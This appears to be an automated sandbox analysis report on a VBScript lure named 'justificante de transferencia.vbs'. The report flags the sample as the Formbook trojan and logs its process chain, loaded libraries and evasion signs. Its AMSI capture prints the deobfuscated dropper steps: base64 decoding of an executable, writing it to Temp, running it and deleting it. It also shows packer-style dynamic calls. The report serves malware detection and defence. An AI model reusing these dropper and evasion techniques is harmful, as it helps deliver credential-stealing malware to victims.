Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA7D73	3_2_01AA7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F3D40	3_2_019F3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AA1D5A	3_2_01AA1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A90CB5	3_2_01A90CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAFCF2	3_2_01AAFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E0CF2	3_2_019E0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A69C32	3_2_01A69C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0C00	3_2_019F0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F1F92	3_2_019F1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAFFB1	3_2_01AAFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E2FC8	3_2_019E2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019FCFE0	3_2_019FCFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A32F28	3_2_01A32F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A10F30	3_2_01A10F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAFF09	3_2_01AAFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A64F40	3_2_01A64F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F9EB0	3_2_019F9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01A02E90	3_2_01A02E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AACE93	3_2_01AACE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAEEDB	3_2_01AAEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_01AAEE26	3_2_01AAEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019F0E59	3_2_019F0E59

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 01A5EA12 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 01A25130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 019DB970 appears 266 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 01A6F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 01A37E54 appears 88 times

Source: justificante de transferencia.vbs

Initial sample: Strings found which are bigger than 50

Source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: temp_executable.exe.1.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.1.dr, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.1.dr, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, AesHelper.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winVBS@5/1@1/1

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Mutant created: NULL

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source:	Binary string: VCGDG76823.pdb source: wscript.exe, 00000001.00000002.2448209205.000001B594E7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2443496915.000001B5945D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2411349967.000001B5940F5000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000002.00000000.2414930191.0000000000222000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.1.dr
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000002.2894155409.00000000019B0000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");IDictionary.Add("@@", "A");IDictionary.Add("))", "T");IDictionary.Add(";;;", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Keys();IDictionary.Item("@@");IDictionary.Item("))");IDictionary.Item(";;;");IDictionary.Item("...");IDictionary.Item("&&&");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAKl9h7kAAAAAAAAAAOAALgELAQYAAMIAAACSAAAAAAAALuA");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "2");_Stream.Close();IWshShell3.Run("C:\Users\user\AppData\Local\Temp\temp_executable.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\temp_executable.exe");IFileSystem3.DeleteFile("C:\Users\user\AppData\Local\Temp\temp_executable.exe")

.NET source code contains method to dynamically call methods (often used by packers)

Source: temp_executable.exe.1.dr, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777258)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777259)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777245))})
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	.Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777258)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777259)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.WIDPf5YagNWIT(16777245))})

Source: temp_executable.exe.1.dr

Static PE information: 0xB9877DA9 [Mon Aug 20 05:01:29 2068 UTC]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_004030E0 push eax; ret	3_2_004030E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0041488D pushfd ; iretd	3_2_0041488F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_00401966 push esi; iretd	3_2_00401967
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_00402179 push ss; retf	3_2_0040213D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0041F1A0 push ss; ret	3_2_0041F1A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0040D4C7 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0040D4CD push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_00418DD0 push ebp; ret	3_2_00418DE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0040D589 push edx; ret	3_2_0040D514
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_004116BB push edi; retf	3_2_004116BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_0042373B push es; ret	3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_00413FC3 push edi; ret	3_2_00413FCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_004237B1 push es; ret	3_2_004237D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 3_2_019E09AD push ecx; mov dword ptr [esp], ecx	3_2_019E09B6

Source: temp_executable.exe.1.dr, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'a4qPf5QYvGf0c', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: temp_executable.exe.1.dr, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs	High entropy of concatenated method names: 'D4r4O0AxSI', 'a4qPf5QYvGf0c', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
Source: 1.2.wscript.exe.1b594e89630.0.raw.unpack, R2mIapWar4cwoqqx6Q.cs	High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 24E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory allocated: 44E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 3_2_01A5D1C0 rdtsc

3_2_01A5D1C0

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

API coverage: 0.7 %

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 6796	Thread sleep count: 160 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 6796	Thread sleep count: 320 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 6768	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 6756	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6844	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

